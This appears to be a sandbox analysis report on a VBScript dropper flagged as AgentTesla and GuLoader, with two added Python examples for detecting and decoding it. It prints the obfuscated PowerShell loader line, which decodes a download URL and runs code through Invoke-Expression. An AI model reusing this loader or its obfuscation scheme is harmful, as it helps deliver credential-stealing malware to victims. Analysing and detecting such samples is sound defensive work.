Windows Analysis Report
G4-TODOS.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
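Detection logic for the chain several of the signatures above describe (a script host spawning powershell.exe with a very long, decoder-style command line), as an added example that is not part of the sandbox report or of the sample. The events are constructed Sysmon-style process-creation records, not logs from this analysis, and the length cutoff and pattern set are assumptions:

```python
"""Detection logic for the script-host -> PowerShell chain flagged above.

Added example for this report; it is not the sandbox's own rule nor part of the
sample. The events below are constructed Sysmon-style process-creation records
(a few dict fields, not real logs from this analysis), and the length cutoff and
pattern set are assumptions.
"""
from __future__ import annotations

import re

LONG_CMDLINE = 1000                      # assumption: "very long command line" cutoff
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

# Traits of the captured loader: a per-character Substring loop bounded by
# Length-1, the 'Substrin'+'g' split, and a call operator on a decoded name.
DECODER_PATTERNS = [
    re.compile(r"\.Length\s*-", re.I),
    re.compile(r"Substrin", re.I),
    re.compile(r"\.Invoke\(", re.I),
    re.compile(r"&\s*\(\$\w+\)\s*\(", re.I),
]


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the names of the signals that fire for one process-creation event."""
    hits: list[str] = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    parent_cmd = ev.get("ParentCommandLine", "").lower().rstrip('"')
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("wscript_starts_powershell")
    if parent in SCRIPT_HOSTS and parent_cmd.endswith(SCRIPT_EXTS):
        hits.append("script_host_dropper")
    if len(cmd) > LONG_CMDLINE:
        hits.append("very_long_command_line")
    if sum(1 for p in DECODER_PATTERNS if p.search(cmd)) >= 3:
        hits.append("substring_decoder_loop")
    return hits


# Constructed events. The first mimics the tree in this report (shapes only; the
# obfuscated literal is a placeholder, not the sample's string).
LOADER_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "\"$a = 1;$b='Substrin';$b+='g';Function F($s){$n=$s.Length-$a;"
    "For($i=5; $i -lt $n; $i+=6){$o+=$s.$b.Invoke($i, $a);}$o;}"
    "function E($x){&($c) ($x);}$d=F '" + "junk. " * 200 + "';\""
)
EVENTS = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WScript.exe",
        "ParentCommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"',
        "CommandLine": LOADER_CMD,
    },
    {   # benign: an administrator running a short cmdlet from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -Command Get-Service",
    },
]


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> fired signals, keeping only events with at least one hit."""
    return {i: h for i, ev in enumerate(events) if (h := score_event(ev))}


if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, ", ".join(hits))
```

The parent/child check alone is noisy on hosts that run logon scripts; requiring the decoder-loop patterns or the command-line length in addition is what separates this loader from routine WScript-launched administration.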
Classification
- System is w10x64
- wscript.exe (PID: 1516, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 4632, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM D umpoholdfz TorreiDdsf jl Ihukl.e nnaa trol/ Hydro5 Bys t.Mosdy0,y rin Hoved( KrydsWMode rinat.inHv ntrdFagopo Hapt wIndv es Si.e Sp rinNbakkeT Afsyn Smuk k1Spids0 F lue. Garg0 Coper;Le.t e KahiWBr. ndiIodo.nY ndet6 uls4 nonco;Heir e s.inkxSy nsh6 Bier4 Lgeu ; Kar a BojsdrAk tievP.ege: Krige1Tan. p2Ha.de1Ov erm.Enhus0 Propi) tag e NargiGSt ilheEg,trc Dclasken,o soSvnig/Ty km.2Svang0 Oks,p1Para c0para.0G. lva1 Bull0 Jasmi1Over . DikerF b adeiConcer Bra,eUnde rfDepaioby ggexTange/ Unis1Phar m2 Atr.1 T j n. hens0 Homop ';$Medicopsychological=Fritidsmuligheds ' Be flUAgi,ns Lac eOve,f rPolya-apo teAWardegt re ceSa,ke nPo.tot,wi st ';$Infection=Fritidsmuligheds ',ingmh Modhat afm gtdissop c ilis Au,o: Flamb/ Sek u/ ,elnd E xtrrUds,yi Paragv Pse ue Fati.dr owngEvigho Br.ttoOrg, ngKrakelMi kroeUndep. Fo micAffa loPanermWe eg/Van bu Tiresc Usr p?DecoleP. enyx An.lp ProduoFoot lrSpooftBa and= Slutd ch.huoFo,s kwBeic,n F orhlPictoo .uropaLagr idopsam&Vi ndeiCommed Missi=Upbl a1John,HCo ldnPRavnem betjeR Ber WKn.glX n stedTrforw TrninNCari oI Trbe6Sp ortXCount5 vvefgErhv eYskuess S weemColpeI H,len9Kand ivSign.6Ta rmreSkimoK Co,ciJTvan gz BegiI E ntrt Met,1 BugleGA ge l-retretpr og.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'Rust fSR ppeeUn quotPa,as- LnforCReub eoSmovsntr anstTweene CostnBesa ntScler Ej nar-ElectP UnaddaLobe ltFlusthAf hng ilitTN eigh:Unlar \ Gul S,on inoBeha,mA heyrbTrial e .remrPes tii footsr eno.hGylte . Nutlt V. luxDa.nitC igar Mi.k- Rt sVLind aaSta.nlCa valu Iliae Fun,t Godm o$ UltrMHi m eu.affes KlarleDelf uEkspamSa lams Lommg BencheHnse sn resisL, mbetClevea PatenSter idPistoeSc rei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDe ndrfFortr I.raf(Elef atUnspieSk i.dsTermit Tid,e-Li i epSmiggaTa l ht Overh Gulv u,te T Rors:T.a um\ScarlSf lyttoTilhy mCame,bUnc ,aeHaandrS yri.iTer i s UhaahBio ry.Retint lumixProbi t Rrlg) Ex pi{ConcleR edbuxf.der i GalmtC.o rt} Ledd;. ksam ');$chaussebrolgningens = Fritidsmuligheds 'c han.erenti cWh.elhmya rioO ist F ibr%Lgnera edlgpGrsr opMyrekdKa pitaLivsvt
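The string scheme in the captured PowerShell command line, re-implemented as an added example (not the malware's code and not part of the sandbox report). The captured Fritidsmuligheds function returns Substring(i, 1) for i = 5, 11, 17, ... while i < Length - 1, so every sixth character from offset 5 is payload and the five characters before each are filler. decode() mirrors that loop; encode() is the assumed inverse used only to build constructed test data; the two short literals from the process tree are taken from the page with the extraction's wrap spaces removed, while the long literals are not used because their whitespace did not survive extraction:

```python
"""Decoder for the string scheme in the captured PowerShell command line above.

Added example; this is neither the malware's code nor part of the sandbox
report. The captured Fritidsmuligheds function returns Substring(i, 1) for
i = 5, 11, 17, ... while i < Length - 1, i.e. every sixth character from
offset 5, with five filler characters before each real character. decode()
mirrors that loop; encode() is the assumed inverse used to build test data.
"""
import random
import re


def decode(s: str, start: int = 5, step: int = 6) -> str:
    # $n = $s.Length - 1; For($i = 5; $i -lt $n; $i += 6) { $o += $s.Substring($i, 1) }
    bound = len(s) - 1
    return "".join(s[i] for i in range(start, bound, step))


def encode(plain: str, seed: int = 0, filler: str = "abcdefghijklmnopqrstuvwxyz ,.") -> str:
    # Assumed inverse: five filler characters before each payload character,
    # plus one trailing filler so the Length-1 bound does not drop the last one.
    rng = random.Random(seed)
    out = []
    for ch in plain:
        out.append("".join(rng.choice(filler) for _ in range(5)))
        out.append(ch)
    out.append(rng.choice(filler))
    return "".join(out)


LITERAL_RE = re.compile(r"'([^']*)'")


def decode_literals(cmdline: str, min_len: int = 7) -> list:
    """Decode every single-quoted literal long enough to hold a payload character."""
    return [decode(m.group(1)) for m in LITERAL_RE.finditer(cmdline) if len(m.group(1)) >= min_len]


# Two short literals from the process tree above, with the extraction's wrap
# spaces removed: the arguments behind $Noncombustible173 and $Arbejdsvrelser.
CAPTURED_SHORT_LITERALS = ["Botet>Trskn ", "SelviiSupereIn skxBredb "]

# Constructed command line in the same shape as the captured one (not the
# sample's long literals; those were reflowed by the page extraction).
SAMPLE_CMDLINE = (
    "$Flokkede=Fritidsmuligheds '" + encode("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", 1) + "';"
    "$Medicopsychological=Fritidsmuligheds '" + encode("User-Agent", 2) + "';"
    "$Arbejdsvrelser=Fritidsmuligheds '" + CAPTURED_SHORT_LITERALS[1] + "';"
)

if __name__ == "__main__":
    for lit in CAPTURED_SHORT_LITERALS:
        print(repr(lit), "->", repr(decode(lit)))
    print(decode_literals(SAMPLE_CMDLINE))
```

Two points worth checking against the tree above: $Arbejdsvrelser decodes to iex, so Exuberate is Invoke-Expression under a call operator, and every literal in the captured command line ends with a space before its closing quote, which is exactly what the Length - 1 loop bound requires (drop that trailing character and the last payload character is lost, as the encode() helper's comment notes).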